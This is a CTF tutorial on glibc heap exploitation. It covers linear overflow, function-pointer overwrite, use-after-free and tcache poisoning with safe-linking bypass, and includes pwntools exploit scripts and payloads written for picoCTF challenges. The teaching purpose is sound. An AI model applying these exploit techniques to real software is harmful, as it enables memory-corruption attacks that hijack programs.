Heap Exploitation for CTF: From Heap Overflow to Tcache Poisoning

Heap exploitation is not scary. It is two questions.

You solved your first stack overflow last month. You wrote b'A'*72 + p64(win_addr) into a netcat pipe, the stack politely handed execution to win(), and the flag popped. You felt good. Then you tried a heap challenge. The writeups named tcache, fastbin, and Houses you had never heard of. You pasted the canonical tcache-poisoning script from a 2019 blog. It crashed inside _int_malloc. You read the post twice. You checked checksec. You gave up.

Here is what happened. The tutorial was written against glibc 2.31. Ubuntu 22.04 ships glibc 2.35. Safe-linking mangled every fd pointer you wrote, __free_hook was removed from the C library in 2021, and the top-chunk sanity check had already eaten half the older exploit techniques (the ones cataloged in the 2005 Malloc Maleficarum write-up and the Phrack articles that followed it). The exploit you copied wasn't wrong. It was dated by four glibc releases.

The heap literature feels priestly because most of it is stale. Modern heap exploitation (the 2026 kind that actually works against a current Ubuntu binary) comes down to two questions:

Which bug does the binary expose?
Which GNU C Library (glibc) ships with it?

There are four bugs worth naming. They map onto a short ladder of primitives: linear overflow, function-pointer overwrite, use-after-free, and tcache poisoning. Everything older (every "House of X" pattern the Malloc Maleficarum blog posts teach, every __malloc_hook closing move) either died in a glibc patch or got replaced by a simpler technique the new allocator enabled. Nobody tells beginners this, so they spend a month learning the museum.

Tcache did not make heap exploitation harder. The thread-local cache glibc added in 2017 collapsed six older dialects into one, and the one is easier.

The picoCTF platform walks this ladder in order: heap 0, heap 1, heap 2, heap 3. Extend with Heap Havoc, Pizza Router, tea-cash, and Horsetrack, and you have the whole ladder in eight binaries.

If you have not solved stack overflow yet, start with the Buffer Overflow guide. If you are comfortable on the stack and want the sibling technique, ROP Beyond ret2libc picks up where leaks run out. This post is the next rung.

Key insight: The rule nobody writes down: every primitive in this post has a glibc version window. Outside that window, either a newer check blocks it or the allocator feature it abuses doesn't exist yet. A heap tutorial that doesn't tell you which glibc it assumes is not a tutorial. It is a historical artifact.

A ten-minute tour of the only allocator that matters

glibc ships a single allocator, ptmalloc2. Every Linux binary you will exploit in picoCTF, Hack The Box, or most major CTFs uses it. Three facts do most of the work.

Fact 1: a chunk is a header plus your data. When your program calls malloc(24), the allocator carves out a contiguous block: an 8-byte size field, then the 24 bytes you asked for, with the total rounded up to a multiple of 16 (the minimum chunk on 64-bit is 0x20 bytes, 32 in decimal). The size field stores the chunk's total size with the bottom three bits repurposed as flags. The lowest bit, PREV_INUSE, is set when the previous chunk is in use. When two malloc calls happen back to back, the chunks end up adjacent in memory, separated only by that header. Write past the end of the first chunk and you land inside the second.

addr   | size/flags | your data
-------+------------+-------------------
0x100  | 0x21       | A A A A A A A ...   <- malloc(24)
0x120  | 0x21       | B B B B B B B ...   <- malloc(24), adjacent
0x140  | 0x21       | C C C C C C C ...
# size 0x21 = 0x20 (chunk size) | 0x1 (PREV_INUSE flag)
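
The size arithmetic in that diagram can be sketched in a few lines of Python. This is a minimal model of the 64-bit rounding rule, not glibc code; the names chunk_size and decode_size_field are made up for illustration.

```python
# Minimal model of 64-bit glibc chunk sizing (illustrative names, not glibc's).
SIZE_SZ = 8        # bytes in the size field
ALIGN = 16         # chunk sizes are multiples of 16 on 64-bit
MIN_CHUNK = 0x20   # smallest chunk the allocator hands out

def chunk_size(request):
    """Total chunk size for malloc(request): size field plus data, rounded up."""
    rounded = (request + SIZE_SZ + ALIGN - 1) & ~(ALIGN - 1)
    return max(rounded, MIN_CHUNK)

def decode_size_field(field):
    """Split a raw size field into (chunk size, PREV_INUSE flag)."""
    return field & ~0x7, bool(field & 0x1)

print(hex(chunk_size(24)))        # 0x20
print(hex(chunk_size(0x28)))      # 0x30
print(decode_size_field(0x21))    # (32, True)
```

The second call is the one to remember: a request of 0x28 bytes produces a 0x30 chunk, which is the size class the tcache examples later in this post use.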

Fact 2: free chunks live in bins, and tcache is the only bin you care about first. The allocator keeps several free lists, sorted by chunk size: tcache, fastbins, small bins, unsorted, large bins. A beginner does not need the taxonomy. You need tcache, and you need to know when tcache fills up.

Tcache (the per-thread cache) was added in glibc 2.26 (August 2017) and changed the entire game. Every free of a chunk up to 0x410 bytes (about 1 KiB) goes into a thread-local singly-linked list instead of the shared arena. There are 64 such lists, one per size class. Each holds up to 7 chunks in last-in-first-out (LIFO) order, meaning the next malloc of that size pops the chunk you freed most recently. No locking, no metadata walk, no sanity checks that the chunk makes sense. That absence of checks is what modern heap exploitation is built on.

Each free chunk on the tcache list uses the first 8 bytes of its own user data to store a fd (forward) pointer to the next chunk on the list. Overwrite fd with a target address and the second malloc of that size returns the target. That sentence is the entire theory of tcache poisoning. You will meet it in Primitive 4.
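
The LIFO order and the 7-entry cap are easier to trust once you have watched them run. The toy class below models a single tcache bin as a Python list; it is a sketch of the behavior described above, and ToyTcacheBin is an invented name, not anything glibc exposes.

```python
# Toy model of one tcache bin: a LIFO stack capped at 7 entries.
TCACHE_MAX_PER_BIN = 7

class ToyTcacheBin:
    def __init__(self):
        self.entries = []                 # last element is the list head

    def free(self, addr):
        """Return True if tcache took the chunk, False if it must go elsewhere."""
        if len(self.entries) >= TCACHE_MAX_PER_BIN:
            return False                  # bin full: glibc falls through to other bins
        self.entries.append(addr)
        return True

    def malloc(self):
        """Pop the most recently freed chunk, or None if the bin is empty."""
        return self.entries.pop() if self.entries else None

bin_0x30 = ToyTcacheBin()
for addr in (0x5060, 0x5090, 0x50c0):
    bin_0x30.free(addr)
first_out = bin_0x30.malloc()
print(hex(first_out))                     # 0x50c0, the chunk freed last
```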

Fact 3: four glibc dates bound your exploit.

glibc 2.26 (2017): tcache arrives. Pre-2.26 exploitation techniques (fastbin-first, unsorted-bin-attack, House of Force) start becoming museum pieces.
glibc 2.29 (2019): tcache double-free check added via a key field in the freed chunk. Naive free(a); free(a); now aborts. The key is only data inside the freed chunk, so a write-after-free can clear it; the bypass is well-known.
glibc 2.32 (2020): Safe-linking lands. Tcache and fastbin fd pointers are mangled with PROTECT_PTR(pos, ptr) = (pos >> 12) ^ ptr, where pos is the address of the storage slot holding the pointer. You now need a heap leak to forge an fd. See Itkin's Check Point writeup for the original paper.
glibc 2.34 (2021): __free_hook, __malloc_hook, and __realloc_hook get removed from the API. Every pre-2021 heap tutorial ending with "now overwrite __free_hook with system" is a dead end on modern systems. I will come back to this in the kill-list.

Tip: Ubuntu 22.04 ships glibc 2.35. Ubuntu 24.04 ships glibc 2.39. Kali rolling is usually a minor version behind. If you are fighting a picoCTF 2024 binary, assume 2.35. Run ldd --version on the remote when you can, or check strings libc.so.6 | grep "GNU C Library" on a downloaded copy.
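
Once you have the version string, the four dates above reduce to a lookup. The sketch below assumes the banner contains the version as the first "major.minor" number, which matches the strings I have seen but is not guaranteed; the sample banner and the function names are illustrative.

```python
import re

# (minimum version, what changes), taken from the dates listed above.
MILESTONES = [
    ((2, 26), "tcache present"),
    ((2, 29), "tcache double-free key check"),
    ((2, 32), "safe-linking on tcache and fastbin fd"),
    ((2, 34), "__free_hook / __malloc_hook removed"),
]

def parse_glibc_version(banner):
    """Extract (major, minor) from a banner line; the format is an assumption."""
    match = re.search(r"(\d+)\.(\d+)", banner)
    if match is None:
        raise ValueError("no version number found in banner")
    return int(match.group(1)), int(match.group(2))

def active_changes(version):
    """List every milestone that applies to the given (major, minor) version."""
    return [label for minimum, label in MILESTONES if version >= minimum]

# Example banner; the package suffix is illustrative.
banner = "GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.8) stable release version 2.35."
for label in active_changes(parse_glibc_version(banner)):
    print(label)
```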

Primitive 1: Linear overflow is the stack bug with a new neighbor

The first primitive you already know in a different form. Write past the end of a heap buffer and you corrupt whatever the allocator put next. That "whatever" is usually either another chunk of user data or a chunk header.

picoCTF 2024 heap 0 is this bug at its gentlest. A 32-byte buffer sits directly before the heap chunk that the safe_var pointer refers to. You write 32 characters through the menu, and the terminating null byte lands on the first byte of that chunk and zeroes it. Option 4 then prints the flag because the guard check passes. No pwntools, no ROP, just counting:

$ nc tethys.picoctf.net <PORT_FROM_INSTANCE>
...
> 2
Data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> 4
picoCTF{my_first_heap_overflow_...}

heap 1 tightens the same bug: instead of zeroing safe_var, the check now wants it to equal "pico". The payload becomes 'A'*32 + 'pico'. Same chunk, same offset, same primitive. The jump from heap 0 to heap 1 is the jump from "I can destroy a value" to "I can write a specific value at a specific place." That is the whole of exploit development in one step.
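
To see why 32 filler bytes put "pico" exactly on the neighbor, here is a toy model of two adjacent 0x20 chunks in a flat bytearray. The layout follows Fact 1; the initial value b"safe" and the helper name user_ptr are placeholders, not taken from the challenge.

```python
# Two adjacent 0x20-byte chunks modelled as one flat bytearray (toy layout).
CHUNK = 0x20
heap = bytearray(2 * CHUNK)

def user_ptr(chunk_index):
    """Offset of a chunk's user data: chunk start plus the 8-byte size field."""
    return chunk_index * CHUNK + 8

# Size fields: 0x20 | PREV_INUSE, stored little-endian.
for i in range(2):
    heap[i * CHUNK:i * CHUNK + 8] = (0x21).to_bytes(8, "little")

heap[user_ptr(1):user_ptr(1) + 4] = b"safe"      # placeholder guarded value

payload = b"A" * 32 + b"pico"                    # the heap 1 payload
start = user_ptr(0)
heap[start:start + len(payload)] = payload       # unchecked write, like the bug

neighbor_value = bytes(heap[user_ptr(1):user_ptr(1) + 4])
print(neighbor_value)                            # b'pico'
```

Note what else got trampled on the way: bytes 32 to 39 of the model, the neighbor's size field, are now all 'A'. That is harmless only as long as the program never frees or walks that chunk afterwards.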

Heap Havoc (picoCTF 2026) is the same primitive dressed up. Two user-supplied names get malloc'd in sequence, the first buffer is undersized relative to the input it accepts, and the overflow corrupts the second buffer's contents. A short pwntools script:

from pwn import *
PORT = 0                               # replace with the port of your instance
p = remote('mysterious-sea.picoctf.net', PORT)
first_name = b'A' * 64 + b'WIN\x00'   # 64 filler bytes, then the second buffer's new value
p.sendlineafter(b'name: ', first_name)
p.sendlineafter(b'name: ', b'ignored')
print(p.recvall().decode())

Note: Every linear-overflow challenge is a counting problem. The interesting number is not "how many bytes does my buffer hold" but "how many bytes until I reach the thing I care about." Read the source, or run it under GDB with pwndbg and use heap or vis_heap_chunks to see the layout (GEF users type heap chunks). Guessing here wastes hours.

The first time I saw how close these heap bugs were to stack buffer overflow, I felt annoyed. A whole category of exploitation had been hiding behind one scary word. It's not a new kind of bug. It's the same bug with a different neighbor.

Primitive 2: Function-pointer overwrite is ret2win on the heap

Promote the neighbor. If the chunk next door contains user data, you get data corruption (the heap 1 outcome). If it contains a function pointer, you get control of the instruction pointer the next time that pointer is called. This is the heap version of ret2win: the binary ships a function that prints the flag, you find its address, you redirect a pointer to call it.

heap 2 is the textbook version. The adjacent chunk holds a single function pointer that option 4 calls directly. The binary ships a dead win() function at a fixed address (the binary is compiled without Position-Independent Executable (PIE) support, so code addresses don't move between runs). The exploit is counting plus little-endian packing:

$ objdump -D chall | grep '<win>'
00000000004011a0 <win>:
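# payload = 32 bytes of filler + little-endian pointer to win(), written as raw bytes
# (print() on a bytes object would emit the b'...' repr, not the bytes themselves)
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*32 + b'\xa0\x11\x40\x00\x00\x00\x00\x00' + b'\n')"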

Pipe the payload in between menu option 2 (write) and option 4 (trigger) and win() fires. That's it. The mechanics are identical to ret2win on the stack: find the address, pack it, place it where a call will pick it up. The difference is the call happens through a heap pointer instead of a return address.
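
If you would rather not type the little-endian bytes by hand, the packing is one struct call. The helper below mirrors what pwntools' p64 does with its default settings; it is written out here only so the example runs without pwntools installed.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)

WIN_ADDR = 0x4011a0                 # from the objdump output above
payload = b"A" * 32 + p64(WIN_ADDR)
print(payload[32:].hex())           # a011400000000000
```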

Pizza Router (picoCTF 2026) is the same primitive with two twists. The bug is a signed-integer index in a reroute command that accepts a negative number and uses it as an array index, giving you a one-shot out-of-bounds write to a heap offset of your choice. The target is a finish callback pointer sitting at heap offset +0x430 that gets fired on the next dispatch command. The second twist: the binary has PIE enabled, so every code address is randomized at startup. You first leak the PIE base through a different command (replay, which prints a value from the heap at +0x2260), then compute the win address before writing.

Key insight: Leak-plus-write is what most modern heap exploitation looks like. A real binary rarely gives you a pre-known win address. It gives you a bug that leaks a pointer and a bug that writes one. Half your exploit is the leak, half is the write, and the pairing is what beginners struggle with. The ASLR and PIE Bypass guide is the leak-half companion to this post.
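
The leak half usually ends in one subtraction and one addition. The sketch below shows that rebasing step with made-up numbers: both offsets and the leaked value are hypothetical, and in a real exploit the offsets come from the binary's symbol table.

```python
# Rebase a leaked code pointer. All offsets below are hypothetical; in a real
# exploit they come from the ELF symbol table (for example via pwntools' ELF).
LEAKED_SYMBOL_OFFSET = 0x1234   # offset of whatever function the leak points at
WIN_OFFSET = 0x1389             # offset of win()

def pie_base_from_leak(leaked_addr, symbol_offset):
    """Subtract the known offset and sanity-check the result."""
    base = leaked_addr - symbol_offset
    if base & 0xfff:
        raise ValueError("base is not page-aligned; wrong leak or wrong offset")
    return base

leak = 0x55d0c4a3b234           # example value a leak primitive might print
base = pie_base_from_leak(leak, LEAKED_SYMBOL_OFFSET)
win_addr = base + WIN_OFFSET
print(hex(base), hex(win_addr))
```

The page-alignment check is the cheap part worth keeping: a PIE base always ends in three zero hex digits, so a base that does not is an early warning that the leak or the offset is wrong.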

Primitive 3: Use-after-free is the pointer you forgot to forget

This one is my favorite because it requires almost nothing from you. No overflow. No OOB index. Just the fact that free(p) does not clear p. It returns the chunk to the allocator and leaves your variable pointing at memory that now belongs to someone else. If the program dereferences p later and you already reallocated that memory with data you chose, the program reads your data thinking it is its own. That is the use-after-free (UAF) primitive, and tcache's LIFO ordering makes it deterministic: the next allocation of the same size is guaranteed to be the chunk you just freed.

The sequence that matters:

1. Program allocates a chunk, stores the pointer in x.
2. Program frees the chunk. x is now dangling.
3. Your exploit allocates a chunk of the same size class. Tcache is LIFO, so malloc hands you the same memory back, with whatever content you wrote.
4. Program reads through x. It reads your data.
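
The same four steps, run against a toy allocator with a single LIFO free list. This is a sketch of the mechanism only: the addresses, the 0x30 stride, and the initial contents b"safe" are invented for the demonstration.

```python
# Toy allocator with one LIFO free list, enough to show the dangling pointer.
memory = {}          # address -> contents
free_list = []       # last freed chunk is handed out first
next_addr = 0x1000

def malloc(data):
    """Reuse the most recently freed chunk if there is one, else carve a new one."""
    global next_addr
    if free_list:
        addr = free_list.pop()
    else:
        addr = next_addr
        next_addr += 0x30
    memory[addr] = data
    return addr

def free(addr):
    free_list.append(addr)     # nothing clears the caller's copy of addr

x = malloc(b"safe")            # step 1: program allocates, keeps pointer x
free(x)                        # step 2: program frees; x is now dangling
y = malloc(b"pico")            # step 3: attacker allocates the same size class
print(x == y, memory[x])       # step 4: True b'pico'
```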

heap 3 runs this script literally. The menu has a free option (5) and an allocate option (2). Free first, allocate second with 'A'*30 + 'pico', then option 4 walks the dangling pointer, reads "pico", and prints the flag. A short pwntools script:

from pwn import *
PORT = 0                                           # replace with the port of your instance
p = remote('tethys.picoctf.net', PORT)
p.sendlineafter(b'> ', b'5')                       # free first
p.sendlineafter(b'> ', b'2')                       # then allocate
p.sendlineafter(b'length: ', b'35')                # 34 payload bytes + terminator (0x30 class, same as 31)
p.sendlineafter(b'data: ', b'A'*30 + b'pico')     # reuse freed chunk
p.sendlineafter(b'> ', b'4')                       # trigger
print(p.recvall().decode())

The allocator hands the memory back because it does not know you still remember where it used to live. Your exploit is just a second reader of a note the program wrote to itself.

Horsetrack (picoGym 2023) is the same primitive one rung up. Horse objects are structs with a name pointer, a speed field, and a display function pointer at offset +0x10. The remove command frees the horse chunk but does not clear the pointer in the horse table. The next add with a same-size crafted name lands in the freed chunk. Place win()'s address at the function-pointer offset of your crafted name, call display on the original slot, and the program calls your pointer. UAF plus fn-pointer overwrite in one challenge.

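Warning: glibc 2.29 added a tcache double-free check. If you free the same chunk twice while it is still on the tcache list, you get an abort. The check looks at a per-chunk key field and, when the key matches, walks the list looking for the chunk. Freeing a different chunk in between does not help (that trick belongs to fastbin). The check is defeatable by overwriting the key before the second free, or by filling the 7-entry tcache list first so the frees fall through to fastbin. This matters in Primitive 4.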
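
The key check itself can be modelled in a few lines, which makes the key-overwrite bypass concrete. This is a toy model, not glibc code: the Chunk class and the TCACHE_KEY value are invented, and only the abort message is copied from glibc.

```python
# Toy model of the glibc 2.29+ tcache double-free check (not real glibc code).
TCACHE_KEY = 0xdeadbeef          # stand-in for the key value glibc stores

class Chunk:
    def __init__(self, name):
        self.name = name
        self.key = 0             # lives inside the freed chunk's user data

tcache_bin = []

def free(chunk):
    # glibc only walks the list when the key matches, then aborts on a hit.
    if chunk.key == TCACHE_KEY and chunk in tcache_bin:
        raise RuntimeError("free(): double free detected in tcache 2")
    chunk.key = TCACHE_KEY
    tcache_bin.append(chunk)

a = Chunk("a")
free(a)
try:
    free(a)
    naive_double_free_ok = True
except RuntimeError:
    naive_double_free_ok = False

a.key = 0                        # attacker clobbers the key through a UAF write
free(a)                          # the check is skipped; a is on the list twice
print(naive_double_free_ok, tcache_bin.count(a))   # False 2
```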

Primitive 4: Tcache poisoning is write-where plus allocate-there

This is the one the internet makes sound priestly. It is not. Three sentences.

One. Every freed tcache chunk stores a forward pointer fd in its first 8 bytes, pointing at the next freed chunk of the same size. Two. If you corrupt that fd to point at an address of your choosing, the allocator will happily link it into the free list anyway. Three. The next two malloc calls of that size return the head of the list and then the address you wrote, so you get an arbitrary malloc.

Here it is against a glibc that predates safe-linking (2.26 through 2.31):

# tcache list for size 0x30 starts empty
a = malloc(0x28)   # -> 0x5060
b = malloc(0x28)   # -> 0x5090
free(a)            # tcache[0x30]: 0x5060 -> NULL
free(b)            # tcache[0x30]: 0x5090 -> 0x5060 -> NULL
*(void**)b = &target   # corrupt b's fd pointer
                       # tcache[0x30]: 0x5090 -> &target -> ???
malloc(0x28)       # returns 0x5090 (pops head)
malloc(0x28)       # returns &target   <-- arbitrary write primitive

Two allocations, one arbitrary-address malloc. That is the whole technique against a glibc under 2.32. You can find this as tcache_poisoning.c in shellphish/how2heap in thirty lines of C, and it is the primitive you will see most often in modern CTF heap challenges (HackTheBox, DownUnderCTF, SekaiCTF, corCTF, LakeCTF).
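
If you want to run the sequence rather than read it, the toy model below threads a free list through a dictionary the same way tcache threads it through the chunks. It assumes the pre-2.32 behavior (no mangling, no validation), and TARGET is an arbitrary made-up address.

```python
# Toy pre-2.32 tcache bin: the list is threaded through the chunks themselves.
memory = {}                      # address -> value in the first 8 bytes (fd)
head = 0                         # tcache bin head; 0 means empty (NULL)

def free(addr):
    global head
    memory[addr] = head          # chunk's fd points at the old head
    head = addr

def malloc():
    global head
    addr = head
    head = memory.get(addr, 0)   # follow fd with no validation at all
    return addr

A, B, TARGET = 0x5060, 0x5090, 0x404040   # TARGET is a made-up address
free(A)
free(B)
memory[B] = TARGET               # the bug: attacker overwrites B's fd
first = malloc()
second = malloc()
print(hex(first), hex(second))   # 0x5090 0x404040
```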

Then safe-linking happened. In glibc 2.32 the fd field gets mangled on every write:

#define PROTECT_PTR(pos, ptr)  ((((size_t) pos) >> 12) ^ ((size_t) ptr))
#define REVEAL_PTR(ptr)        PROTECT_PTR(&ptr, ptr)

pos is the address of the storage slot holding the pointer (which is the address of the freed chunk's user data, so a heap address). A raw &target written into fd gets XORed with the mask when the allocator reads it back, so the list now points at a random-looking address and the next malloc of that size usually aborts or crashes. To make the attack work you need to know pos >> 12, which means you need a leak of a heap pointer. In practice you get one by reading a chunk that is already on the list (its fd has been mangled for you) and inverting the mask.

The helper is four lines of Python:

def mangle(pos, ptr):
    return (pos >> 12) ^ ptr
def demangle(mangled, pos):
    return (pos >> 12) ^ mangled  # pos = address of the fd slot

Getting the heap leak is usually the hardest part, so the mechanic is worth a minute. If a program lets you read the contents of a chunk that is already on the tcache list (through a UAF read, a print-after-free, or a leftover pointer), what you see is a mangled fd. That mangled value equals the next chunk's address XORed with (this_chunk_addr >> 12). The easiest case is the first chunk freed into an empty list: its next pointer is NULL, so the stored value is exactly this_chunk_addr >> 12. Shift that leak left by 12 and you have the address of the page the chunk sits on, which on a small heap is the heap base. When next is not NULL, the top 12 bits of the 48-bit pointer still come through unchanged, and you can peel the rest off 12 bits at a time, provided both chunks sit on the same page. Then you can forge any mangled pointer you want.
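
Both leak cases can be worked through offline. The sketch below uses made-up heap addresses; demangle_same_page is a hypothetical helper that only works under the stated assumption that the pointer and the slot holding it share a 4 KiB page.

```python
def mangle(pos, ptr):
    return (pos >> 12) ^ ptr

def page_from_null_fd(leak):
    """Last chunk on a list has next == NULL, so its stored fd is pos >> 12."""
    return leak << 12

def demangle_same_page(mangled, rounds=4):
    """Recover ptr without knowing pos, assuming both sit on the same 4 KiB page."""
    ptr = mangled
    for _ in range(rounds):
        ptr = mangled ^ (ptr >> 12)   # each round fixes 12 more bits, top down
    return ptr

# Made-up heap addresses for illustration.
chunk_a = 0x55555555a2a0          # freed first: fd = mangle(chunk_a, NULL)
chunk_b = 0x55555555a2d0          # freed second: fd = mangle(chunk_b, chunk_a)

leak_a = mangle(chunk_a, 0)
leak_b = mangle(chunk_b, chunk_a)
print(hex(page_from_null_fd(leak_a)))     # 0x55555555a000
print(hex(demangle_same_page(leak_b)))    # 0x55555555a2a0
```

The loop works because the mask is the pointer shifted right by 12: the top 12 bits are already correct, and each pass uses the bits recovered so far to unmask the next 12.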

Mainline pwntools does not ship a safe-linking helper, so expect to write mangle yourself. A working exploit against a 2.32+ binary looks like this:

from pwn import *

# Skeleton only: HOST, PORT, leak, a_idx, b_idx, b_offset, size and the helpers
# free_chunk / edit_freed / alloc / write stand in for challenge-specific code.
def mangle(pos, ptr):
    return (pos >> 12) ^ ptr

elf = ELF('./vuln')                 # path is a placeholder
p = remote(HOST, PORT)
# 1) leak the heap page: read the fd of a freed chunk whose next pointer is
#    NULL (the first chunk freed into an empty list); that value is pos >> 12
heap_base = leak << 12
# 2) free two different same-size chunks. free(a); free(a) aborts on
#    glibc 2.29+, so build the list from A then B.
free_chunk(a_idx)
free_chunk(b_idx)
# 3) corrupt b's fd to point at the target, mangled
target = elf.got['printf']          # GOT (Global Offset Table) slot,
                                    # writable under Partial RELRO; on 2.32+
                                    # the target must be 16-byte aligned
edit_freed(b_idx, p64(mangle(heap_base + b_offset, target)))
# 4) two mallocs: first pops b, second returns target
alloc(size)
arbitrary = alloc(size)             # == target
# 5) write through the returned pointer
write(arbitrary, p64(elf.sym['win']))

The picoCTF platform puts a constrained version of this primitive in tea-cash (picoCTF 2026). The interface gives you a single byte write at a chosen heap offset, which is just enough to change one byte of a freed chunk's fd and redirect the next allocation. It is a good rehearsal of the technique with training wheels: no full pwntools exploit required, just the mental model of "the fd pointer is the next malloc."

Tip: If a tcache-poisoning exploit silently produces garbage, the mask is almost always wrong. Print heap_base, print mangle(pos, target), print the actual bytes you are writing. A mangled heap pointer has a distinctive shape: the top 12 bits of the 48-bit address survive unchanged, and everything below them looks scrambled. If your mangled value still looks like a clean heap pointer, you forgot to mangle it.
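
One way to make that debugging habit automatic is to route every forged fd through a single helper that prints what it is about to write. The sketch below is an assumption about how you might structure it; forge_fd is an invented name and both addresses are hypothetical. The alignment test reflects a check glibc added alongside safe-linking in 2.32: a tcache entry that is not 16-byte aligned aborts with "malloc(): unaligned tcache chunk detected".

```python
def mangle(pos, ptr):
    return (pos >> 12) ^ ptr

def forge_fd(slot_addr, target):
    """Build the 8 bytes to write into a freed chunk's fd on glibc 2.32+."""
    if target % 16:
        # glibc 2.32+ aborts on tcache entries that are not 16-byte aligned
        raise ValueError(f"target {target:#x} is not 16-byte aligned")
    mangled = mangle(slot_addr, target)
    print(f"slot={slot_addr:#x} target={target:#x} mangled={mangled:#x}")
    return mangled.to_bytes(8, "little")

# Hypothetical addresses: a freed chunk on the heap and a writable target.
fd_bytes = forge_fd(0x55555555a2d0, 0x404040)
```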

Dead primitives: the kill-list (don't waste a week here)

Three things every pre-2021 heap tutorial teaches that are useless on Ubuntu 22.04 or newer. You will run into them in older writeups, blog posts, and the Phrack 57:8 and 66:10 articles, alongside the 2005 Malloc Maleficarum write-up that introduced the "House of X" naming convention. A "house" is just a nickname for a specific chain of allocator-state manipulations that produces an arbitrary write. These three techniques no longer work. I wish someone had shown me this list before I spent an afternoon reimplementing House of Force.

House of Force

Corrupt the top chunk's size field to a huge value, then malloc anywhere. Patched in glibc 2.29 (2019) by adding a sanity check that the top chunk's size does not exceed av->system_mem. Dead everywhere a picoCTF binary will land. If a tutorial still opens with this, it was written for a pre-2.29 glibc.

Fastbin dup

Classic double-free into fastbin then two mallocs. Largely displaced by tcache poisoning once glibc 2.26 started routing small frees through tcache first. Tightened again in glibc 2.32, when safe-linking began mangling fastbin fd pointers as well. Even before that, tcache swallowed most chunk sizes before fastbin saw them, so the demo rarely triggered on a real binary. Honorably retired.

__free_hook / __malloc_hook

The canonical closing move of every 2016-2020 tutorial: "overwrite __free_hook with system, call free("/bin/sh"), shell." Removed from the public API in glibc 2.34 (August 2021). The symbols exist as compatibility stubs and have zero effect on runtime behavior. On Ubuntu 22.04 you can't reach a shell this way.

The next rung up from tcache poisoning, where you need one, is FILE struct attacks (also called File Stream Oriented Programming, or FSOP): overwrite an _IO_FILE vtable pointer so that the next call to fflush, exit, or a stderr write jumps somewhere under your control. It is the modern replacement for __free_hook. Beyond the scope of this post, but worth knowing by name the first time you hit a glibc 2.35 challenge where tcache alone does not close the loop. Read how2heap for the canonical demonstrations.

Note: If a writeup looks promising but the author does not name the glibc version, treat it as suspicious until you have checked the dates. Heap tutorials rot fast.

The three things that actually kill these chains

A tcache-poisoning exploit that runs and looks right but hands you garbage on the remote is almost never failing because of the technique itself. The usual culprits, in decreasing order of how often they bite:

1. Forgot safe-linking

Safe-linking starts at glibc 2.32. Ubuntu 20.04 (glibc 2.31) predates it, but 22.04 ships 2.35 and every later release has it. If you are following a 2019 tutorial and writing raw pointers into fd, the allocator is demangling them on read and following the list to nonsense. Symptom: clean exploit, instant abort or SIGSEGV inside malloc. Fix: mangle every pointer you put on a singly-linked list.

2. Wrong chunk size class

Tcache is size-indexed. A chunk freed at size 0x30 goes on a different list than a chunk freed at 0x40. If your target allocation is a different size than the one you corrupted, the head you poisoned is never consulted. Run bins in pwndbg (heap bins in GEF) and watch your list grow before you commit to the attack.
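
A quick offline check catches this before you touch the debugger. The sketch below applies the 64-bit rounding rule and the 64-bin layout described earlier; the function names are illustrative, not glibc's.

```python
def chunk_size(request):
    """64-bit chunk size for malloc(request): add 8, round up to 16, minimum 0x20."""
    return max((request + 8 + 15) & ~15, 0x20)

def tcache_index(request):
    """Which of the 64 tcache bins serves this request, or None if too large."""
    size = chunk_size(request)
    if size > 0x410:
        return None
    return (size - 0x20) // 0x10

def same_bin(request_a, request_b):
    """True when both request sizes are served from the same tcache bin."""
    idx_a, idx_b = tcache_index(request_a), tcache_index(request_b)
    return idx_a is not None and idx_a == idx_b

print(same_bin(0x28, 0x20))   # True: both become 0x30 chunks
print(same_bin(0x28, 0x30))   # False: 0x30 vs 0x40 chunks
```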

3. Misread offset

Chunk sizes round up to a multiple of 16 bytes on 64-bit, and the chunk header starts 16 bytes below the returned pointer (prev_size at p - 0x10, size at p - 0x8). "The buffer is 32 bytes" does not mean the next thing is exactly 32 bytes away. Step through a free with GDB and inspect the chunk at p - 0x10 before you guess.

The common thread is that none of the three tells you what went wrong. The first dies deep inside the allocator, far from your mistake; the other two often produce no crash, no printf, no feedback at all. When a heap exploit fails quietly, it's almost always not landing where you think.

Quick reference

The ladder: bug to primitive

Primitive	Bug shape	picoCTF receipts	Works on glibc
P1: Linear overflow	Write past the buffer end into the neighbor's data	heap 0, heap 1, Heap Havoc	All
P2: Fn-ptr overwrite	Overflow or out-of-bounds (OOB) write lands on a callback pointer	heap 2, Pizza Router	All
P3: Use-after-free	Program keeps pointer after free, you reallocate the chunk	heap 3, Horsetrack	All (tcache LIFO makes it deterministic)
P4: Tcache poisoning	Corrupt fd pointer on free list, malloc returns attacker address	tea-cash	2.26+ (plus safe-linking mangle on 2.32+)

Decision order when you see a heap challenge

1. checksec --file ./vuln. Note PIE, RELRO, canary. Note the glibc version from the provided libc.so.6 if one ships with the challenge.
2. Read the source or the menu. Classify the bug: overflow, OOB write, UAF, double-free, off-by-one.
3. Match bug to primitive. Overflow into adjacent data is P1. Overflow reaching a function pointer is P2. Dangling pointer after free is P3. Control over a freed chunk's fd is P4.
4. If the glibc is 2.32 or newer, assume safe-linking. Find a heap leak first, then write the exploit.
5. If the glibc is 2.34 or newer, __free_hook is gone. Plan a FILE struct or win-function pivot instead.

pwntools cheat sheet

# Linear overflow / fn-ptr (P1/P2)
p.sendline(b'A'*OFFSET + p64(win_addr))
# Use-after-free (P3)
free(idx); alloc(size, payload); trigger(idx)
# Safe-linking mangle for tcache (P4)
def mangle(pos, ptr): return (pos >> 12) ^ ptr
# Reveal a mangled fd (pos = address of the fd slot)
def demangle(m, pos): return (pos >> 12) ^ m
# Inspect the heap while iterating (local process only; vis_heap_chunks is a pwndbg command)
gdb.attach(p, 'vis_heap_chunks')

Everything above is four ideas and one XOR. The literature obscures that because the literature is organized by primitive name instead of by bug shape. Read it with the mapping in your head, and the priesthood collapses into a lookup table.

One concrete move. Open heap 0. Solve it in under five minutes. Then walk the series in order: heap 1, heap 2, heap 3, Heap Havoc, Pizza Router, tea-cash, Horsetrack. Before you read any writeup, name the primitive and the glibc it targets out loud. The allocator was never the hard part.